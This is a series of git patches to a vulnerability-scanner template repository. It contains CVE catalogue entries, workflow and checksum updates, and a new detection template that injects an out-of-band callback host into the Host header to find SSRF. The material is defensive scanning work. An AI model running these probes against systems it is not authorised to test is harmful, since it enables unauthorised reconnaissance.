2.3.1.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-2356.yaml"} {"ID":"CVE-2023-23752","Info":{"Name":"Joomla! Webservice - Password Disclosure","Severity":"medium","Description":"An issue was discovered in Joomla! 4.0.0 through 4.2.7. An improper access check allows unauthorized access to webservice endpoints.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-23752.yaml"} {"ID":"CVE-2023-24044","Info":{"Name":"Plesk Obsidian \u003c=18.0.49 - Open Redirect","Severity":"medium","Description":"Plesk Obsidian through 18.0.49 contains an open redirect vulnerability via the login page. An attacker can redirect users to malicious websites via a host request header and thereby access user credentials and execute unauthorized operations. NOTE: The vendor's position is \"the ability to use arbitrary domain names to access the panel is an intended feature.\"\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24044.yaml"} @@ -1911,7 +1911,7 @@ {"ID":"CVE-2023-24489","Info":{"Name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-24489.yaml"} {"ID":"CVE-2023-24657","Info":{"Name":"phpIPAM - 1.6 - Cross-Site Scripting","Severity":"medium","Description":"phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24657.yaml"} {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"} -{"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"} +{"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735 2.yaml"} {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"} {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"} {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"} @@ -1961,6 +1961,7 @@ {"ID":"CVE-2023-30212","Info":{"Name":"OURPHP \u003c= 7.2.0 - Cross Site Scripting","Severity":"medium","Description":"OURPHP \u003c= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30212.yaml"} {"ID":"CVE-2023-30256","Info":{"Name":"Webkul QloApps 1.5.2 - Cross-site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30256.yaml"} {"ID":"CVE-2023-30777","Info":{"Name":"Advanced Custom Fields \u003c 6.1.6 - Cross-Site Scripting","Severity":"medium","Description":"Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-30777.yaml"} +{"ID":"CVE-2023-30943","Info":{"Name":"Moodle - Cross-Site Scripting/Remote Code Execution","Severity":"medium","Description":"The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-30943.yaml"} {"ID":"CVE-2023-31059","Info":{"Name":"Repetier Server - Directory Traversal","Severity":"high","Description":"Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-31059.yaml"} {"ID":"CVE-2023-31548","Info":{"Name":"ChurchCRM v4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2023/CVE-2023-31548.yaml"} {"ID":"CVE-2023-32117","Info":{"Name":"Integrate Google Drive \u003c= 1.1.99 - Missing Authorization via REST API Endpoints","Severity":"high","Description":"The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2023/CVE-2023-32117.yaml"} @@ -1992,7 +1993,7 @@ {"ID":"CVE-2023-35885","Info":{"Name":"Cloudpanel 2 \u003c 2.3.1 - Remote Code Execution","Severity":"critical","Description":"CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-35885.yaml"} {"ID":"CVE-2023-36287","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36287.yaml"} {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} -{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross-site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} +{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} {"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"} {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"} {"ID":"CVE-2023-37265","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"} @@ -2012,6 +2013,7 @@ {"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"} {"ID":"CVE-2023-3936","Info":{"Name":"Blog2Social \u003c 7.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The Blog2Social WordPress plugin before 7.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3936.yaml"} {"ID":"CVE-2023-39361","Info":{"Name":"Cacti 1.2.24 - SQL Injection","Severity":"critical","Description":"Cacti is an open source operational monitoring and fault management framework. Affected versions are subject to a SQL injection discovered in graph_view.php. Since guest users can access graph_view.php without authentication by default, if guest users are being utilized in an enabled state, there could be the potential for significant damage. Attackers may exploit this vulnerability, and there may be possibilities for actions such as the usurpation of administrative privileges or remote code execution. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-39361.yaml"} +{"ID":"CVE-2023-39598","Info":{"Name":"IceWarp Email Client - Cross Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in IceWarp Corporation WebClient v.10.2.1 allows a remote attacker to execute arbitrary code via a crafted payload to the mid parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-39598.yaml"} {"ID":"CVE-2023-39600","Info":{"Name":"IceWarp 11.4.6.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp 11.4.6.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-39600.yaml"} {"ID":"CVE-2023-4173","Info":{"Name":"mooSocial 3.1.8 - Reflected XSS","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4173.yaml"} {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index b2da667d54..797c53d907 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -d3d61b5b23048ba01c949efdf8b4fe02 +94ab0ea203148a351347fbd7445877bd From afe7e73c7f4056e6427c8395adf33c1ad3f83eee Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Tue, 12 Sep 2023 16:06:40 +0530 Subject: [PATCH 0325/1090] chore(deps): bump actions/checkout from 2 to 4 (#8192) Bumps [actions/checkout](https://github.com/actions/checkout) from 2 to 4. - [Release notes](https://github.com/actions/checkout/releases) - [Changelog](https://github.com/actions/checkout/blob/main/CHANGELOG.md) - [Commits](https://github.com/actions/checkout/compare/v2...v4) --- updated-dependencies: - dependency-name: actions/checkout dependency-type: direct:production update-type: version-update:semver-major ... Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> --- .github/workflows/autoassign.yml | 2 +- .github/workflows/syntax-checking.yml | 2 +- .github/workflows/template-checksum.yml | 2 +- .github/workflows/template-validate.yml | 2 +- .github/workflows/templates-stats.yml | 2 +- .github/workflows/wordpress-plugins-update.yml | 2 +- 6 files changed, 6 insertions(+), 6 deletions(-) diff --git a/.github/workflows/autoassign.yml b/.github/workflows/autoassign.yml index fc33468374..8270afc60b 100644 --- a/.github/workflows/autoassign.yml +++ b/.github/workflows/autoassign.yml @@ -15,7 +15,7 @@ jobs: ASSIGN_TASK_TOKEN: ${{ secrets.PDTEAMX_PAT }} # github personal token steps: - name: checkout repo content - uses: actions/checkout@v2 # checkout the repository content + uses: actions/checkout@v4 # checkout the repository content - name: setup python uses: actions/setup-python@v4 with: diff --git a/.github/workflows/syntax-checking.yml b/.github/workflows/syntax-checking.yml index d9fa9321c1..96947c547c 100644 --- a/.github/workflows/syntax-checking.yml +++ b/.github/workflows/syntax-checking.yml @@ -10,7 +10,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v4 - name: Yamllint uses: karancode/yamllint-github-action@v2.1.1 with: diff --git a/.github/workflows/template-checksum.yml b/.github/workflows/template-checksum.yml index 915713f526..cae9eaf298 100644 --- a/.github/workflows/template-checksum.yml +++ b/.github/workflows/template-checksum.yml @@ -13,7 +13,7 @@ jobs: runs-on: ubuntu-latest if: github.repository == 'projectdiscovery/nuclei-templates' steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: fetch-depth: 0 diff --git a/.github/workflows/template-validate.yml b/.github/workflows/template-validate.yml index 005e5387b7..00f8e06b30 100644 --- a/.github/workflows/template-validate.yml +++ b/.github/workflows/template-validate.yml @@ -10,7 +10,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: fetch-depth: 0 diff --git a/.github/workflows/templates-stats.yml b/.github/workflows/templates-stats.yml index b9b699ece9..368aed20f1 100644 --- a/.github/workflows/templates-stats.yml +++ b/.github/workflows/templates-stats.yml @@ -10,7 +10,7 @@ jobs: build: runs-on: ubuntu-latest steps: - - uses: actions/checkout@v3 + - uses: actions/checkout@v4 with: fetch-depth: 0 diff --git a/.github/workflows/wordpress-plugins-update.yml b/.github/workflows/wordpress-plugins-update.yml index aa211f7838..063b61f7f9 100644 --- a/.github/workflows/wordpress-plugins-update.yml +++ b/.github/workflows/wordpress-plugins-update.yml @@ -10,7 +10,7 @@ jobs: runs-on: ubuntu-latest steps: - name: Check out repository code - uses: actions/checkout@v3 + uses: actions/checkout@v4 with: persist-credentials: false # otherwise, the token used is the GITHUB_TOKEN, instead of your personal token fetch-depth: 0 # otherwise, you will failed to push refs to dest repo From 4783d4605db1a34f243dc182fc2f4c1adb60204e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 12 Sep 2023 17:00:26 +0530 Subject: [PATCH 0326/1090] Create external-service-interaction.yaml --- .../external-service-interaction.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/miscellaneous/external-service-interaction.yaml diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml new file mode 100644 index 0000000000..611384bf8b --- /dev/null +++ b/http/miscellaneous/external-service-interaction.yaml @@ -0,0 +1,32 @@ +id: external-service-interaction + +info: + name: External Service Interaction + author: andreluna + severity: info + description: External Service interaction via Host Header Injection. + reference: + - https://portswigger.net/kb/issues/00300210_external-service-interaction-http + - https://success.qualys.com/support/s/article/000006843 + - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection + classification: + cwe-id: CWE-918,CWE-406 + tags: http,misc,oast + +http: + - method: GET + path: + - "{{BaseURL}}" + + headers: + Host: "{{interactsh-url}}" + + redirects: true + max-redirects: 1 + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + condition: or From 8dfc12f0229736c097f3561a8f6f8759e4f934d3 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 11:33:42 +0000 Subject: [PATCH 0328/1090] Auto Generated Templates Checksum [Tue Sep 12 11:33:42 UTC 2023] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 31eb3e01c9..3b89cef349 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:46e94935eba8934af2bfd77e17dd4bb352a4ec0d TEMPLATES-STATS.md:3f74e66db0aeaf37e1b9d401f4d8fc23bc8a059f TOP-10.md:d9e01f12d3aad16e5a340a0d8d59a87dc902e62c contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:50ad24f7101b7875bd72ee8c22d5310b2e1a8ed5 -cves.json-checksum.txt:f8967aefd08c72c7ae46c998df61cc4f4f8a494e +cves.json:6e83667e7f33958621824fed4245a351acee3203 +cves.json-checksum.txt:3e7561a12ee2184a64d881a91e020ed3fc7eda00 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -2583,7 +2583,7 @@ http/cves/2023/CVE-2023-30210.yaml:71ae3d7ad314976aeb71b729180811c8651167f3 http/cves/2023/CVE-2023-30212.yaml:7bbba5d69097264c92082a2d1c0137a7112afb4f http/cves/2023/CVE-2023-30256.yaml:fba23a427b13b465c1344cd715b20ace2bab0c04 http/cves/2023/CVE-2023-30777.yaml:a85266e648712c90b7a61c36203e54bd870a1294 -http/cves/2023/CVE-2023-30943.yaml:53ac50460d580e0b330c544482270c1c4338ab44 +http/cves/2023/CVE-2023-30943.yaml:09857723f89bb4d27e54632552b4069bb4c42c4c http/cves/2023/CVE-2023-31059.yaml:79beddc21d9c94f13d891bed078ef8ba86c2e742 http/cves/2023/CVE-2023-31548.yaml:cc09e62b3690267dd292538836d508334541ae41 http/cves/2023/CVE-2023-32117.yaml:be5730b349c6bc4b04a813fa448394ef7afe48f5 @@ -4248,6 +4248,7 @@ http/miscellaneous/detect-dns-over-https.yaml:a0d05c1d3526c2368d9957b37ab44f6177 http/miscellaneous/dir-listing.yaml:397e6f739d91d1935d49bdd18bb899b4072efcdd http/miscellaneous/email-extractor.yaml:63aa4024f928d8c41e0d80eb19f2b02e1b02af25 http/miscellaneous/exposed-file-upload-form.yaml:9c025ae5e5ce865588cd1d3ea91522b559ff8a23 +http/miscellaneous/external-service-interaction.yaml:089b796041f0ffbab042629a4b057f6279a0b644 http/miscellaneous/firebase-database-extractor.yaml:0c276fddfc49fdf19983f9ce36b40351af0aec57 http/miscellaneous/google-floc-disabled.yaml:b741fb4fc11cff0f2c861f961a8bfff633e05196 http/miscellaneous/gpc-json.yaml:994f54409ea33bd6173cafd61e47f5c7bd0a807b @@ -7062,7 +7063,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:d8ef453b6f2b8c37125483012007e02b105a0b4f +templates-checksum.txt:4fae86dcdf4f5c9615feefe71161f4f2ffb7f0d1 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 5a04b33faa66db75f5c9bc01f2df8d8baf871767 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 11:35:25 +0000 Subject: [PATCH 0329/1090] TemplateMan Update [Tue Sep 12 11:35:25 UTC 2023] :robot: --- http/miscellaneous/external-service-interaction.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/http/miscellaneous/external-service-interaction.yaml b/http/miscellaneous/external-service-interaction.yaml index 611384bf8b..6c83d1007d 100644 --- a/http/miscellaneous/external-service-interaction.yaml +++ b/http/miscellaneous/external-service-interaction.yaml @@ -11,6 +11,8 @@ info: - https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/17-Testing_for_Host_Header_Injection classification: cwe-id: CWE-918,CWE-406 + metadata: + max-request: 1 tags: http,misc,oast http: From f9fe314b2cd2e1202895d596292fbc6b23a7ca08 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 12 Sep 2023 17:15:08 +0530 Subject: [PATCH 0330/1090] name - update --- http/cves/2023/CVE-2023-39676.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-39676.yaml b/http/cves/2023/CVE-2023-39676.yaml index ddaa910db8..750c89c505 100644 --- a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -1,7 +1,7 @@ id: CVE-2023-39676 info: - name: PrestaShop XSS in fieldpopupnewsletter Module + name: PrestaShop fieldpopupnewsletter Module - Cross Site Scripting author: meme-lord severity: medium description: | From c5323a9437c902f2283207c6d6a30aca36f2fbce Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 11:58:20 +0000 Subject: [PATCH 0331/1090] Auto Generated New Template Addition List [Tue Sep 12 11:58:20 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 7c6bf6e38a..c61791f7aa 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2023/CVE-2023-30943.yaml +http/cves/2023/CVE-2023-39676.yaml http/exposed-panels/phpldapadmin-panel.yaml http/exposed-panels/symantec/symantec-phishing-panel.yaml http/misconfiguration/gitlab/gitlab-public-registration.yaml From 177fcdd470b4a502955067c3da6a7ec18598648a Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Tue, 12 Sep 2023 11:58:30 +0000 Subject: [PATCH 0332/1090] Auto Generated Templates Checksum [Tue Sep 12 11:58:30 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 3b89cef349..bf75f812ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2637,6 +2637,7 @@ http/cves/2023/CVE-2023-3936.yaml:532e4362ad3b479f2a1ecf57b06d981336b3882e http/cves/2023/CVE-2023-39361.yaml:027864ed06754ef87a7de376519681d526b46eb6 http/cves/2023/CVE-2023-39598.yaml:8e973be5da8bbccce493cb02d6a2c314605b02a6 http/cves/2023/CVE-2023-39600.yaml:c326d0e518d5a41c899dbf0a15c6d4e28f00b705 +http/cves/2023/CVE-2023-39676.yaml:66ffbd384c6992c5a70fc66c29a75aa2fdd22f3b http/cves/2023/CVE-2023-4173.yaml:6b300087c13e3a095031bc1a2d0f8d8590f1a6d8 http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071 @@ -4248,7 +4249,7 @@ http/miscellaneous/detect-dns-over-https.yaml:a0d05c1d3526c2368d9957b37ab44f6177 http/miscellaneous/dir-listing.yaml:397e6f739d91d1935d49bdd18bb899b4072efcdd http/miscellaneous/email-extractor.yaml:63aa4024f928d8c41e0d80eb19f2b02e1b02af25 http/miscellaneous/exposed-file-upload-form.yaml:9c025ae5e5ce865588cd1d3ea91522b559ff8a23 -http/miscellaneous/external-service-interaction.yaml:089b796041f0ffbab042629a4b057f6279a0b644 +http/miscellaneous/external-service-interaction.yaml:c5a4a57e1aaa133711e415b5f69f20c835a2ba71 http/miscellaneous/firebase-database-extractor.yaml:0c276fddfc49fdf19983f9ce36b40351af0aec57 http/miscellaneous/google-floc-disabled.yaml:b741fb4fc11cff0f2c861f961a8bfff633e05196 http/miscellaneous/gpc-json.yaml:994f54409ea33bd6173cafd61e47f5c7bd0a807b @@ -7063,7 +7064,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:4fae86dcdf4f5c9615feefe71161f4f2ffb7f0d1 +templates-checksum.txt:83deeebf8e7d3375034644e0b42af3bc2be0bab8 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From bf07097a616586ea77256c18f0770507ca67146b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Wed, 13 Sep 2023 04:02:13 +0000 Subject: [PATCH 0333/1090] Auto WordPress Plugins Update [Wed Sep 13 04:02:13 UTC 2023] :robot: --- helpers/wordpress/plugins/cookie-law-info.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/formidable.txt | 2 +- helpers/wordpress/plugins/leadin.txt | 2 +- helpers/wordpress/plugins/mailpoet.txt | 2 +- helpers/wordpress/plugins/pinterest-for-woocommerce.txt | 2 +- helpers/wordpress/plugins/post-smtp.txt | 2 +- helpers/wordpress/plugins/sg-cachepress.txt | 2 +- helpers/wordpress/plugins/woocommerce.txt | 2 +- helpers/wordpress/plugins/wp-reviews-plugin-for-google.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 